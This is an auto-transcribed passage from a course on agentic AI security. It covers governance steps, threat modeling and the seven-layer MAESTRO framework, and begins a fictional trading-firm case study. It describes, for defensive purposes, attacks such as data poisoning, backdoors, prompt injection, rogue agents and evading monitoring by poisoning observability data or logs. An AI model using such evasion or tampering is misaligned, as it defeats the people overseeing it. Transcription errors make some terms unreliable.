that maturity yet, right? So this will help you
to refine and mature your AI and agentic AI maturity
as the technology was. The key thing is visibility that there is a
committee who has visibility into where and what agentic AI is
being implemented. It's not like when
somebody is about to implement agentic suddenly they call you and say, we're
going live tomorrow. You know how it is, right?
So that is the second step. Third step is developing an
AI governance framework. So you want to have
a framework for how AI will be controlled
when you company. You know, that will
set down the policy. That will set down the
dos and the don'ts. Like will we use public
or private agentic AI? What are the allowed and
disallowed use cases? How will we be doing
risk assessments? There are many, many
frameworks present, such as the NSTAIS
management framework. That is a great one. The EU AI Act is also good. It's very high level, but
it's also quite good. You also have the
ISO 42 double 01, which helps you create
an AI management system. I believe there is
one coming out on the security one also. But there are many, many best practice
FeMix already there. Do not start create
the wheel from scratch if you already have good types of
framework present, instead, leverage what is there, so you get that understanding. So you want to create an
AI governance framework, and then the next
level is setting down technical controls.
I want you to stop. There's a reason I
said wait because I'm going to deep dive into
this into the next lesson which is around threat
modeling because when you create technical controls for mitigating agentic EI risks, you want to base it around threat modeling and risk
assessments, right? Not just like I said,
there is no one size fits all template that will cover every single use
case that is there. You want to make sure
that it is tailored to the particular risks of your company, and
how do we do it? We're going to talk about
it in the next lesson. So keep that in mind, but just let's hold off on this
until the next lesson begins. And lastly, is monitoring
and improving. So you want to monitor, is your agentic EI risks
increasing or decreasing? Are you able to identify them or if your risk
tracker is zero, there's no risk there
I think there is something if you're
implementing agentic I. You want to mature over time. Do not expect it to be perfect. You're going to make
a lot of mistakes because agentici is very new. Don't get frustrated
because of that, because your company's maturity and understanding of
agentici will improve. Think about where your knowledge was at the start of this
course, and now where you are, I hope I have helped you to improve your
knowledge of agentic EI, but same thing with any company, knowledge and maturity
will increase, and new best practices
are going to come out as companies
understand agentic I, you know, nest and ISO, all of them will be releasing agentic, the best practices. So adopt them as they
become available. So this is what I wanted
to talk to you about in this lesson that
agentic AI security does not exist in a vacuum. This is not something you tell your cybersecurity like I don't know, engineer
to implement. This has to be at a
much higher level and then go down to the
technical controls. Without a culture,
nobody is going to take it seriously unless there
is alignment at all levels. You want to leverage existing
best practices like NIST, like EU, like ISO for
creating that framework. Do not start implementing the wheel as that takes
simply to knowledge. And why would you
want to do it if you already have industry
best practices available. So now that we understood
the framework, let us talk about in the next lesson threat modeling and how and why we should
threat model and how we do it for agentic AI. Thank you very much, and I'll
see you in the next lesson.
19. 18 - Threat Modeling Part 1 : Hello, everybody.
Welcome to this lesson. And in this lesson,
we're going to be talking about threat
modeling agentic AI. So now if you remember,
in the previous lesson, I talked about creating
a culture, right, for securing agentic
AI and how to do it. And we paused on the
technical control because I wanted to do
this lesson first, right? And we've talked about all the different types of
risks that are there with agentici rogue AI agents or somebody hijacking
the AI agents, the ones which are
there and distributed or centralized architectures. You know, we talked
about all these things. So how do we know which risks are applicable to
our environment? Well, the way to do
about a threat modeling. And that is what we want
to talk about here, and this will drive what sort
of controls you implement. So what are we going
to be covering? We're going to be
covering how to threat model AI agents and the unique implementations of these systems when we
do threat modeling. And I'm going to talk about
the maestro framework, which is a unique framework for threat modeling
of AI agents. So first of all, what
is threat modeling? So threat modeling, now this
is the OWAS definition, which is like a set
of activities for improving security
by blah, blah, blah. I don't like reading
those book definitions. You can read it yourself,
but simply put, it is a type of a
risk assessment which focuses on applications and looking at applications from the perspective of
an attacker, okay? You want to look at
your application from the perspective of
what an attacker is going to be thinking about
when he tries to compromise this
particular application. That is the whole point
of threat modeling. So this is what you
want to look at, okay? And Threat modeling is
a very powerful tool. Your standard risk
assessments will not give you as much visibility into what your application threats are as threat motor because
threat modeling specifically highlights risks at the design phase and
how it's structured. A lot of those
frameworks are there. They really help you to identify specific
risks which are there. So this is pretty much like
whichever framework you use. These are the four
questions that organize threat modeling,
like what are we working on? What's the application?
What can go? What are we going
to do about it? And did you do a
good enough job? That's it. It's not
rocket science. It's very, very straightforward, and that's what makes
it so powerful. Threat modeling, the most effective threat modeling
sessions I have seen, they do not involve any tools. They just involve
a bunch of people sitting in a room
with a whiteboard, but having a good
session, you know, understanding how the
threats are mapping it out, creating those data flows. And that is what makes threat modeling so so very powerful. You don't need some fancy
multimillion AI powered tool or something like that,
just a whiteboard will do. But asking these four questions in a proper structured way. And how do we structure them? There are many, many
frameworks which help you to structure these
four questions. There is something like stride. This is the one I use the most, which basically
organizes those threats in these categories,
which is spoofing, tampering, repudiation,
information disclosure, denial of service, and
elevation of privilege. So whatever threats
are there, it helps categorize them into
these six categories. There's also the process for attack simulation
and threat analysis, which is pastor. I
really like that. Abbreviation and operational
critical threat asset and vulnerability
evaluation octave. All of them, like I said, they go back to these four
questions that are there. And these are
amazing frameworks. I mean, I'm not
knocking them at all. I have been using stride for God knows how many years
for threat modeling, but there are some
pudent problems when it comes to applying
them to agentic AI. They are very, very useful,
but they have gaps. When it comes to agentic AI, they don't address the unique challenges that
come from autonomy, which we talked about and the interactive nature
of these systems, you know, that agents
can be unpredictable. Traditional frameworks, they
really struggle to model the unpredictable nature of EI agents because they're
not able to understand, Hey, what happens when somebody
makes independent decisions, and they don't cover
things like misalignment, which we talked about,
like the agents goals becoming misaligned with
what their purpose were. So like an AI stock
trading agent suddenly becoming
corrupted, right? And things like data poisoning, which are there in
machine learning, evasion, modal extraction,
if you remember, we talked about these
sort of things. So this is where unfortunately sometimes
the problem come in, and especially also
the interaction one, like we talked about
agent to agent interactions in a multi
agent environment, right? Dynamic interactions
between multiple agents, where agents can
start collusion or not being able to explain what
they are the rogue agents, all these attacks can
become a bit more difficult to do with
these sort of framework. So that's why we need
new types of framework. They are good at least
two of them are very, very good, which is
one is from OWASP, which is agentic EI threats and medications, and one is maestro, which is multi agent
environment, security threat, risk, and outcome. Both
of them are very good. I personally like maestro
more, and I'll tell you why. Why? Because it categorizes
it into seven layers. And the OVAS one is also good, but it is not as
thorough as maestro, which is why I wanted you to I wanted to talk about maestro
first. Now, what is this? Like I said, it is
like a framework, which is specifically optimized for threat modeling agentic EI, and it adds specific
threat categories for agentic EI risks, and it specifically is focused
on multi agent and how these multiple agents can impact the environment
around them. That is why this is such
a powerful framework. And if you look at this,
this is how it looks like. So these like the seven
layers which are there. So it expands upon
additional categories, which stride and pasta and all those other
things do not have. Like I said, it explicitly considers the interaction
between AI agents, and it has layer like
a layer security. So it has security at these seven layers and
specifically organized. So it's around the seven
layer reference architecture, which is foundation models, data operations, agent
frameworks, deployment. Valuation, security
and compliance and the agent ecosystem. So this is how it's structured, and it's very, very powerful. I'm going to stop there because I've already talked quite a bit. I don't want to overwhelm you. Now in the next
lesson, we're going to start deep diving into this
reference architecture, what it is, what it means, and the different
risks and threats it identifies and how
to mitigate them. So thank you very much, and I'll see you in
the next lesson.
20. 19 - Threat Modeling Part 2: Hello, everybody. Welcome back. Now in this lesson, I'm going to be
continuing what we were discussing
about previously, which is the MScuFramework for
threat modeling, agentici. Like I talked about, now
this is a new framework which expands and adds
additional categories, and this is specifically
focused on agentici. It's a new framework made by
the Cloud Security Alliance, and it addresses
the limitations of other frameworks like
stride and pasta and octave and all those
because it does focus on multi agent security risks and the environment that
they are operating in, you know, and it gives you a layered security architecture. So it's very, very powerful especially when you're
starting out in agentic AI. So what am I going to
do is we're going to go layer by layer to understand
what's talking about. And then we're going
to do a case study also to see how we would practically apply this to
agentic framework, right? An agentic security like doing a threat modeling of
an agentic architecture. So let's get started now. Now, the first thing
we're going to start is the very first layer, which is the foundation model. So I'm going to go
from the start from the bottom and move
my way up to the top. Okay? Now, the layer one
is the foundation model. Now, this is the
foundation model, which is the core
component that powers agentic E. This is where the
reasoning happens, right? If you remember that agentic first needs to
understand what you're doing, and then it uses this
wasling to break it down into tasks which
are then executed. So this is the core model on
which the agent is built. And this can be a large
language model like ChachiPT Cloud, Gemini,
whatever, right? Or it can be pre trained
or fine tuned models. And this is basically the intelligence
layer for AI agents. If you look at this one, this is a single agent
architecture from OWASP. I found it very
good, like the way they've broken it down,
the architecture. And at the right, you can see the way the model
is the LLM model, right? This is what
we are talking about. And so what are the risks
that would be there in this architecture
when we're talking about the foundational
model that is there? So we've talked about this
before, but data poisoning, right, because the model would be trained
on certain data. The attackers could
potentially inject malicious data into
the training site, which will corrupt the
decision making of the model. Or they could steal the model. By repeatedly quering it, they could understand,
Okay, this is how the model was trained. They could do
adversarial attacks, which is things like
prompt injection. They could carefully craft
these prompts and put in some malicious data into
it to trick the EI model. They could do backdoor
attacks, also, right? When the model was being built, somebody was able to inject
some sort of backdoor into the and that can
execute later on. Or they could reprogram
the model because they have access to the model
where it's being stored. If you remember we
talked about model poisoning attacks earlier on. All these things are possible
at this particular level. And what can we do about it? What are the
mitigations for this? Very simple, things like
adversarial training where you train the foundation model with these sort of
samples to harden them. So we actually try to do it like we talked about
redeeming earlier, right? We actually hit the
model with these sort of malicious examples to see how
well it can deal with them. Rate limiting, which
is if you want to stop attackers from
stealing your models, you can limit the
amount of API calls which are from a
particular location. If somebody is just hammering
your model with queries, then you know there'll
be some sort of attacks happening, right? Water marking. You can actually embed
signatures within your model, and we can find out if somebody
has stolen this model. Somebody has made an
unauthorized copy, because of this unique
signature, differential privacy. If somebody is trying to
find out what data you use, you can put noise within
your training data, so the attacker will not be
able to differentiate between the noise and the actual
sensitive data that is there. And stopping somebody from reprogramming your
model. What can you do? You can use in hardcore, the use cases that the
model is being used for. So you can restrict the AI agents to predefined
applications and use cases. So these are just some of the mitigants which you can use. I'm not saying this
is the only list, of course, you can add your own, but this is just to
show step by step how we're building up
the security controls. The next one is the
data operations. Now, the data operations is, of course, the names the
data about the data. The layer handles how
data is collected, stored and processed for AI training and real
time decision making. So a lot of times you
will get a model right, but you want to supplement
it with additional data. So this can be things like retrieval
augmented generation. The name sounds very fancy. This is just a database which
within your environment, that helps the LLM or
the agentic AI to get real time data because you can't be retraining the
model every time, right? That takes a lot of
money, a lot of storage. So what you do is you create some sort of a
temporary database, say, for example, about
your company policies. So when the agentic
EI gets a query, it first queries this database to get real time information, and that helps to
supplement its reasoning. So apart from that, you have data ingestion
pipelines which are being used to
refresh the model, storage systems or basically wherever data is being stored. You can take a look
at this within the same architecture from OBS. You can take a look at
this is where we can think about where
the data will be stored supporting services, which the model will be calling the gentik will be
calling to supplement it. Now attacks here, I think that's pretty obvious what sort of attacks will
happening here, right? Data poisoning. Somebody will try to compromise and inject malicious data into
the data sources or simply stealing it, right? Because they know that
the training datasets are kept in this database, they can try to compromise
this training dataset and replicate. To
create their own model. They can do model inversion, which is like we talked
about this earlier, querying the model to
reverse engineering. So they can extract what sort
of training data is there. We talked about differential
privacy earlier, doing a Dids on
the data pipeline. So if they have access, they can overload
the data source, and this will prevent the AI agent to get new
sort of information wide? Compromising the retrieval
augmented generation pipeline. The same the temporary databases that we talked about
the knowledge base, which causes AI agents to
get updated information, you can compromise that,
and that will lead to the AI agents generating
wrong information, right, because
you've compromised that database which is there. Again, all the mitigations that we talked about
earlier, you know, things like encryption,
making sure that the services
are locked down, differential privacies
they carry over, but apart from that, having
data versioning and tracking, you want to make
sure that you know if somebody compromises
with your data, you can roll back to a safer
version. Endo encryption. Even if somebody compromises the training data you
will have that data secured in transit and at rest access controls,
locking it down, right? You want to follow the
principle of least privilege. You don't want to give access to the knowledge base and your
data stores to everybody. And of course, anomaly
detection in data pipelines. Somebody is suddenly accessing it from a completely
new location, some sort of suspicious
behavior is happening. Somebody is trying to
change a lot of the data. All of those should
generate security alerts, which your team
should investigate, he what is happening here. So this was the layer two, which is the data operations. Okay, moving up
now, where are we? We are at layer three now, which is the agentic
frameworks, agent frameworks. Now, these are the
agent frameworks are basically defined how
AI agents are built. Now, we've moved up.
We've gone on for the foundation model.
We've gone from data. Now we're talking about
the agentic framework. This includes like we're
talking about here that frameworks like
you saw clue AI, lang chain, open AI, API. These are your
development toolkits or conversational AI frameworks. And these are like the
integration toolkits, the SDK. Nobody builds AI agents
from scratch, right? You are going to be
using some sort of a framework from an
existing company. What if that framework
itself is compromised? Right? The attackers
are not stupid. They know that if
they do a supply chain attack on a framework, they have the ability
to compromise multiple customers
at the same time. So what sort of attacks
can we talk about? The obvious one is supply
chain attack, right? If I'm able to compromise
this framework, I can inject backdoors into the agentic AI logic which
other companies will be using. Or I can put a backdoor
vulnerabilities into the AI libraries, right? I can put weaknesses there. I can do a denial of service on the framework APIs because the agentic frameworks will
be using this sort of API. It can have a massive denial of service on
multiple customers. I can even trick like do basically understand the
weaknesses that are there and try to bypass the
inputs which are done. Or I can understand the
frameworks weaknesses. I can evade the
frameworks because now I have access
to the framework, I can understand, Okay, these are the built
in security controls which the company has put in. This is how I can
try to avoid it. So what are the mitigations? Here, of course, you
are dependent on the provider, obviously, right, because the provider
is the one who will be making sure that the
security framework is secured, but you can do regular
security audits. You can scan your third
party dependencies, just like you do with software. You can do that, making sure that you have a zero
trust AI design. You want to make
sure that the agent every agent is treated as
potentially compromised, right, just like you do with
zero trust and making sure that all their actions are always authorized beforehand, securing your API gateways. So making sure that somebody is hammering if you are the
owner of that framework, you can secure your API Gateway, hardening your EI
prompt handling. So even if agentic AI, you find out somebody
has compromised, you can put making sure that you've tested your agentic AI, and they can actually withstand the sort of prompt
injection attacks. And, of course, red
teaming EI agents. Why wait for somebody to find out a weakness in your
agentic AI Framework? Why don't you do it yourself
and inform them, right? So this is again, upskilling
your teams to making sure that they are able to understand these
sort of things. So this was Layer three. Moving on to deployment
and infrastructure. This is the easiest one
because this is basically the layer on which your
AI agents run, right? The Cloud or on premise. I would say 99% of the time companies are
not going to be running this in house simply because they want to leverage
existing frameworks, right? And providers like AWS,
Google, Microsoft, all of them have
built in frameworks, and the cost of running and storing AI
agents, that is considerable. That's why most companies, they leverage existing
infrastructure from the Cloud, right? From AWS GCP Azure. And they are running usually running it on containers
like Docker and KubintsO it might be
on fam environments. So these are the sort of
deployment and infrastructure. What if somebody is able
to compromise this, right? So this where it would happen. But remember this, and I've
talked to this before. All those existing security best practices they
carry forward, right? Hardening your environment, hardening your infrastructure. If you've not secured your
Cloud infrastructure, uh, worrying about agentic CA is
not going to do much, right, because this is like locking your window but
keeping your front door open. So you want to make sure that the deployment infrastructure on which your agenticA is working, that is properly
hardened properly following security
best practices, lockdown as per mist
or CIS benchmarks. You want to make sure
that is happening. What are the threats
and security here? Compromised EI containers. So somebody can compromise
the EI containers, the containers on which AI
environments are running or they could detous on the
whole infrastructure, right? They could compromise the
cloud security infrastructure. Maybe you put it on an
AWS S three bucket. And you've exposed it
over the Internet. Obviously, somebody can easily get access to your
training data now, or they could hack into
your Kubernetes cluster, gain unauthorized access to all the nodes which
have AI running there. They can hijack your resources, start a encrypto
there, laterally move. Maybe you have an AWS account or an Azore subscription
or a Google account, which is not secured in
development environment. An attacker is able
to compromise there, but because you do not
have proper segmentation, he is able to
laterally move into your production
Cloud environment where your agentic AI is there. So many possibilities
are there, right? And even manipulating
infrastructure as code. Maybe you're deploying
your AI agents to infrastructure as code. Somebody is able to get
access to that pipeline and tamper with the cloud formation
or the terraform scripts. So what can you do here? All your best practices carry you forward,
like I said before, everything from securing
your Cloud environments, making sure that
they are secure. You have to do that, obviously. On top of that, making sure
your containers are hardened. You're following best
practice principles. So not like every word. The whole world has access
to your Cloud environment. No, obviously, you
want to implement some Cloud security posture
management solution, which continuously benchmarks
your Cloud environment and lets you know if
something is happening. Following the zero trust
principles, right? Assuming that everybody is compromised and everybody is
potentially unauthorized, not trusting anybody
whether they're coming from inside or
outside the network, putting in security scanning within your infrastructure
or pipeline. So you want to scan your
terraform and cloud formation for vulnerabilities before
applying them to production. So all these things you have
to do when you're doing it. So let's take a break
here because, again, I want you to
understand I don't want to bombard your mind with
too much information. Let's take a break here. And then in the next lesson, we're going to start
from layer five. Thank you very much, and I'll
see you in the next lesson.
21. 20 Threat Modeling Part 3: Hello, everybody. Welcome. Welcome. This
is a continuation of the previous lesson where we were discussing the
Maestro framework. And I believe we had reached up to level four, layer four. Now we're going to be
talking about layer five, which is evaluation
and observability. So like the name says,
this is focusing on how AI agents are evaluated
and monitored, you know, the visibility that you have into AI agent, or how
they are behaving, the tools and the processes
for tracking performance, and detecting if
something is going wrong. So this will cover the
AI abserbility tools, anomaly detection frameworks, compliance monitoring,
making sure that they are actually behaving the
way they are behaving. So if you look at
this architecture, your observability would
be on everything, right? Everything which is
there, you have to monitor and how
it's going around. And what are the threats
and security risks? Of course, if
you're an attacker, the first thing you would want
to do is evade detection. So basically manipulating
EI behavior to avoid that detection or manipulating
the evaluation metrics. So you want to mess around with the metrics
which are being used to evaluate EI so that you can the teams would not be aware of what's
going on, right? Doing a denial of service
on the monitoring system. So disrupting the logging
which is happening there or even doing a data leakage via the observability dashboard, because maybe you can find out what sort of
models are running, what are the critical models. You know, inference,
you can find out so much data if you get access to the
observability dashboard. You can find out what are the service level
agreements, you know, the uptime, downtime, what are the key metrics
which are being used. If you find out what
are the key metrics, you will find out what are the ways in which the
teams will get alerted. So many like possibilities
are there when it comes to absorbility or lastly poisoning
the observability data. Basically, you're
manipulating the data which is fed into the
system for AI system. So this way, you can actually
hide the activities that you're doing from
security making yourself making it a
security blind spot. If you can access the data
data is being fed into the observability
systems and actually cut off that connection
or feed bogus data. EI the security teams will not know what
you're doing, right? So this is, again,
this is the sort of risks that are
visible at layer five. What can we do about it? Well, first of all,
is making sure that implementing
explainable AI. Now, this might
not seem obvious. Why are we talking about
explainable AI implementation here when we're talking about
observability? Very simple. If somebody is messing
around with observability, those decision making logs
will get impacted also. Suddenly you will see different decisions
being made, right? So this will help to
detect that somebody is tampering those AIs and
you're not picking it up. Behavior audits,
regularly assessing the AI security logs, making sure that suddenly
you are getting blank logs, or suddenly that connection is disrupted or suddenly
you're getting very, very clean logs which
looks suspicious. Putting some sort
of AI monitoring on that also,
adaptive monitoring, that anomaly detection, suddenly all the AI agents come in green. All of a sudden, it
never happens, right? Deviations from that
baseline you need to do. And lastly, the four,
which is the most obvious securing your
logging infrastructure. Actually, that should
be number one. I should have put
that at number one. You want to make sure that your logging infrastructure
is hardened only the very minimum
people have access to that logging infrastructure and the people that do
have read only access. Nobody should be able to write to that logging infrastructure, right, to try to hide
and stop the tracks. And even the people
who have read access, they should have only the
very minimum which is needed so that data
cannot be leaked out. So these are all the best practices you
need to think about. Okay, now we are at Level six, which is the security
and compliance layer. Now, this is a different layer. This cuts across all the other
layers because security, of course, you can't
just restrict it, right? That's what we have
been talking about. But it makes sure that
the security controls and the compliance controls are present in all the
EI agent operations. And this also zoos
that you're using agentic AI as a security tool within your
company, you know? So it includes things
like agentic AI, security automation, the
governance of those EI agents. And, for example, if you remember when we
talked about earlier, the use cases within
cybersecurity, I talked about self
healing networks, right? Like AI powered zero
trust networks. So you have AI agents which are monitoring the network and adapting to it in real time, any security attacks or security compromises are
being responded in real time. So you can have these
sort of things. What are the risks which are
there quite a lot, actually. All those risks we
talked about earlier, all of them, they
can apply here also. S, like somebody poisons the
data of the security agents. So this way, they will be
either doing false positives, false negatives and mess up the visibility that they
have or somebody evades that somebody finds out a way of doing
adversarial attacks which make them basically invisible to those
security agents. They can compromise
it Rogue agents. Somebody takes control
of them and hijacks. We talked about
agentic AI hijacking. So they can use it to
disable defenses because of the access with these agentic AIs regulatory non compliance. If you uh, EI agents are
not trained properly. You can actually
violate privacy laws. Maybe they're accessing PII and they are not masking or
encrypting it properly. Biases we talked about bias earlier. I'm not
going to repeat it. Lack of explainability.
You don't know why the AgentI is
making these decisions. We talked about this.
Remember, maybe the AgentEI is locking down
users, disabling access, disabling security controls or maybe making security
controls very, very restrictive, but you don't know why it's
doing that because you do not have access
into the decision making. And lastly, model extraction. Similarly, basically
attackers, trying to understand why the agent is behaving like this
and then extracting it, extracting the logic behind it so that they can
reverse engineer and bypass it so that they are not visible
to the security agents. So many mitigants
are there. I mean, all of them that we
talked about earlier, making sure that you have proper audit trails doing audits of these AI agents and the training data so that if somebody is poisoning that data, you are available using
adversarial training, basically doing red teaming of these security agents to make sure they are
properly hardened. Deploying multi layered
security detection, which combines AI and your normal traditional
security tools, implementing zero trust security and access control so that nobody should be able to access the security
agents network, continuously monitoring
your AI agents. So not just having
them monitor people, you're monitoring the
security agents also, putting in proper
fill safe mechanisms. What if a security agent is compromised that has access
to all your sensitive data, all your sensitive systems? How do you override it, right? Integrating compliance
monitoring into these security systems so that you also know
that they do not have access to any sensitive
or PI data and limiting API queries to make sure that if somebody is trying to
reverse engineering model, they will get blocked
because if somebody is hammering them
continuously with API, you will detect it and
stop it from happening. So we're almost at the end now. Now we're talking
about the layer seven, which is the agentic
AI ecosystem, the very top layer.
What is this one? This is the overall the
broader environment. You know, your AI agents are
actually interacting now. We weld applications,
users, and other AI system. This is the layer with
the vast majority of users will be interacting
with agentic EI. This can be the AI marketplaces where you're getting
these AI agents, multi agent networks,
enterprise, automation platform. I mean, the use
cases are endless. And this is where the AI agents are doing their magic, you know, they're autonomous
decision making, maybe they're doing
transactions, interactions. And this is where you really
have to think about uh, all the new types of security risks that we talked
about earlier. So maybe this is like I really like this
diagram from OWASP again. This is more of a
multi agent network, and this is like a hierarchical, you know, your supervised agent, which is looking at
multiple agents, and they are interacting
with people, interacting with
devices, all those things you have to think about when you're doing
threat modeling. And the risks that we talked about earlier,
like misalignment, compromise agents, basically
attackers injecting their own malicious agents into the network into the ecosystem, which can trick users, an attacker impersonating
agent, you know, maybe an attacker accesses the digital certificate and he inserts and he
mimics an EI agent. So you're thinking
you're interacting with a legitimate EI agent, but it's actually
the attacker, right? And similarly, the attackers stealing or manipulating
the agent credentials. Maybe they get access to
the digital certificate. Agent tool misuse their Somebody compromises an AI agent and makes them do
unauthorized actions. Agent gold manipulation, we talked about this
earlier misalignment, where either by the attacker or basically you did not give
the instructions properly, leading to misaligned actions, which the AI agent goes
on on its own journey, you know, It's not following
what you told it to do, and that can have
a massive, massive impact as we saw earlier. So so many like even
the list is not complete yet because
this is where the majority of the
six I see happening. Marketplace manipulation. If you are looking at agentic
EI from a marketplace, somebody is putting
fake reviews, fraudulent ratings, to allow their fake EI services to
gain market dominance. This is nothing new if you've ever downloaded apps
from the Android store. You know how malicious apps
are somehow promoted there. All these things are
very much possible. Integration risks, basically how the APIs or the applications, the agents are talking
to each other. Weaknesses in APIs or
software development kit. Can allow attackers to exploit
this AI to AI interaction, you know, compromising
the agent registry. Agents are being stored
somewhere, right? Maybe they modify AI listings so that they can put their
own rogue agents there. Malicious agent
discovery, pushing their own agents to the top of the marketplace and suppressing
the legitimate ones. So all these sort of attacks, you have to think the
mitigations are massive icon. These are just a
few, but putting in proper agent authentication
and trust verification, you know, putting in some sort of cryptographic private key, public key so that only authorized agents
can be injected. Detecting the
behavior, basically, monitoring the EI systems, agentic EI to flag any compromise
or deceptive EI agents, securing the EI integration
and API controls. The goal alignment
and governance, we talked about this before, making sure that the AI is
always aligned to the goals, the misalignment is happening, then you at least have human
beings who can override it. Having a decentralized
AI reputation. So you can verify the AI credibility not
through the ratings, but through long
term performance. So there's a trust system there which the tacks
cannot manipulate. Tamper proofing your
agent registry. So putting in controls like
Block and Blase validation so that nobody can so there's like a whole ecosystem of trust. Somebody cannot just push an
agent to the top of the pile and override your gers and making sure that the
marketplace is resilient. So this will be more
on the marketplace, but having sure that just like the Android marketplace
is monitored, you have fraud detection
algorithms that let you know that this EI
agent is not trusted. And, of course, secure EI
deployment and self healing, similarly to what
we have in DevOps, that the EI can self
repair and roll back. Mitigate the damage from
compromised E agents. These are just a few of the
mitigants which we can see. So now I hope you've understood how powerful
maestro is compared to the other threat modeling
frameworks because this is based purely
on agentic EI, and that's what makes
it so powerful. So this was a long
lesson and the PS also. But I just wanted to show
you the power of maestro. It gives you a very, very
good similar architecture. And it addresses the agentic
EI risk we talked about, but it does it in a
very structured manner. So I want you to
really go through this this lesson multiple times so that you have a very
good understanding. I will link the
maestro framework also to the lesson so you can take a liquid also
from the Cloud security alliance
Thank you very much. And now, what we're going to
do is we can apply Mysore to a case study to see how it works in actual practical reality. Thank you very much. I'll
ask you in the next.
22. 21 - Threat Modeling Case Study: Hello, everybody.
Welcome to this lesson. Now we're almost at
the end of the course. Now you have a good idea
of agentic EI risks and like the different types of risks that emerge at
the different levels. So what am I going to do is
I'm going to do a case study because if you've ever
taken any of my courses, I don't like to just talk
about a particular framework. I always like to show it being implemented as part
of a case study. So you get a better idea towards practical implementation
as opposed to me just talking and
talking and talking. That's just boring,
honestly speaking. So what are you going to be
cover, we're going to apply maestro in a practical
theoretical environment, not actual real world
environment, but a case study. And we're going to see the step by step approach for how to practically implement Maestro
for agentic ITT pdling. So just a quick recap. I'm sure you like, if you've taken the
previous lessons, if you haven't then please
go back and watch them. Don't jump directly
to this lesson. But these are the seven
layers which we talked about the foundation
data agent deployment, evaluation security and agent ecosystem from layer
one to layer seven. Where we assess and mitigate the different
risks that are there. So how do we implement it? Now, we know the
seven layers, right? So let's assume you have
an agentic AI framework. So the first step you want to
do is decompose the system. You want to br it down into the seven layer
architecture, right? Because if you don't know which
layer fits at what level, B it down into that
maestro framework, and then do layer
specific threat modeling. So use the layer specific
threat landscapes that we talked about earlier to
find out what are the risks, and then you can tailor the specific threats
to your system. This way, you'll know,
okay, what thread exists at what level and what
controls I have to implement. Cross layer threat
identification. There are certain
risks at one layer that will impact the agentic
at a different layer. And we will see an
example of this, but this is very, very
important to consider. There are certain
things which are cross layers like security. Security is implemented at all layers, right? It's
not just one layer. It's not just I believe
it was layer six, right? It's not just layer six. It
crosscuts across all layers. Then you do that risk assessment where you assess the
likelihood and impact. Whatever likelihood
impact matrix you like to do risk assessment, you know, high,
medium, qualitative, quantitative, it doesn't matter. You can use whichever
one you want, okay? And then we do the
mitigation and then monitor. That's pretty much it. It's
very, very straightforward. If you've ever done risk
assessments or threat modeling, it is pretty much
the same concept. Nothing is drastically
different here. But so let's take
an example, right? So there is a company
called Omnitech Solutions. They are like a
global tech giant, right, specializing in AI
powered financial automation. So they were using EI heavily
for financial automation, you know, trading
and helping banks, and now they are moving
on to agentic EI. So they've recently deployed agentic EI to optimize real
time trading strategies, you know, automate financial
poten, detecting foss. Now, they are
deploying agentic EI. And this system consists of multiple in a multi
agent environment, multiple autonomous agents that are interacting dynamically
with financial data, clients, regulatory
compliance, right? However, naturally enough,
the leadership team, especially the CSO and
the EIS security team, they're kind of worried
about the risk of deploy like an AI with
such level of autonomy, especially in a mission
critical environment, right? They are probably afraid
of potential threats such as adversarial attacks, data poisoning, gold miss
alignment, AI manipulation. So to make sure that they
understand the risk, they decide to use
the mastroFramework, and for doing a proper threat modeling
and risk mitigation. So this is what the
environment is. What first thing
they want to do is, like I said, system
decomposition. They want to break it down into the seven mistro levels because by decomposing the AI
system into these layers, they can now
identify threats and apply controls
specific to the layer. So the first one would
be the foundation model. This is where your
core AI model. Whatever LLM you're using for, like, trading, fraud detection, you want to cover them there. Data operations with
the market fields which are coming and feeding
into the application, trading history, compliance report retrieval
augmented generation. All things come here. Agenticm whatever agentic FMI they use to build
these agenticiFMA. Maybe it was open source, maybe it was an
enterprise level, but consider is it
hosted outside? Is it hosted on preme,
whatever they're using. Deployment infrastructure,
whatever cloud they're using, maybe they're using AWS Azore
I've written AWSA sorry. But yeah, whatever
cloud infrastructure, is that properly hardened. Evaluation and observability. How do we know what's going on? How do you know what the
agentic AI is doing? Are is it doing properly?
Is it being compromised? Is it deviating from
its goals, right? All these things you
have to understand. Security and compliance,
very important. It cross cuts across
all the layers, right? Not just I've written
CAS security policies, but we are not just talking
about security policies. Maybe you have a security
agent also deployed. That is making sure
that all the trading is happening as per regulatory
guidelines, right? And lastly, the ecosystem. This is where the agents will be interacting with the
external parties financial, brokers, traders,
or other agents. So this is how they would
break it down, right? You can make it more
detailed if you want. But this is at
least a good start. Then okay, one by one, we want to look at the
risks which are there. Now, I wet in the mitigation here with this example third
because obviously you would do this later
on that I just for the purposes of making it
more easier to understand, I put in the mitigation here. So the first one would be
the foundational model is somebody manipulating
these AI model, right to make incorrect
financial decisions. Somebody doing prompt injection or maybe like the w in here, they inject specially crafted data into the market signals. Why? To trick the AI
into making bad trades, bad decisions? How
do we mitigate it? We do something like
adversarial training, which you test, you harden the EI system
by running these sort of scenarios against it
to see how resilient. Is it able to understand? Is
it able to or does it start making wrong decisions
because it's not properly hardened against
these sort of attacks. And also using model
monitoring to detect that the underlying LLM which
the Agente EI is using, it is able to if it's deviating, you
are able to detect it. Layer two would be the
data operation layer. This is where, of
course, data poisoning. That's always the
biggest risk, right? Because what is happening is maybe you are using some
sort of market feed. Maybe you're using
retrieval Opin generation, some vector database to feed and give more context to
the agentic KI, right? Now, here, attackers can do data poisoning to mess
up the decision making. And the example threat I've
written is attackers can maybe inject manipulated
historical trading data. So the trading
data is incorrect. It's not representing what
is actually happened to mess up the predictions and the trades which
are happening, right? So you would verify the
data integrity using cryptographic signing to make sure that the data is coming from an authorized
source hardening the data pipelines
to make sure nobody can access it in an
authorized manner. Layer three would be the
agentic framework quit. This is the framework
that I'm using. Nine times out of ten, you would not be using your
own agentic AI framework. You will be relying on
something like I don't know, I talked about crew AI or any multi agent framework
that you're using, what if somebody compromises
that framework, right? Supply you an attack, similar to what happened
with solar wins. A third party A library
using model training, maybe that contains
a hidden backdoor. So what can you do? You have to make
sure that you have a good supply chain security
risk management program, especially, and that extends
to your AI frameworks, also. Use something like
a software bill of materials to make
sure that you know what are your
critical dependencies and what are the
vulnerabilities. Track, make sure that you are aware if something
is happening. Do your own pen testing of
the EI agents which are built using this framework so that you understand that
what is the extent, making sure these
agents only have the least amount of
permissions that they need. If your EI agent is
only being used for reading data and you've
given it full admin access, yeah, that's definitely
not security PS practice. A four, deployment
infrastructure. This is where your
Cloud infrastructure, which is hosting the agentic AIF talked about AWS, that
gets compromised. And that allows
attackers to take over the agentic EI console and
hijack the AI agents, right? Maybe the attacker can gain
access to Cubanites winning the agents and modify
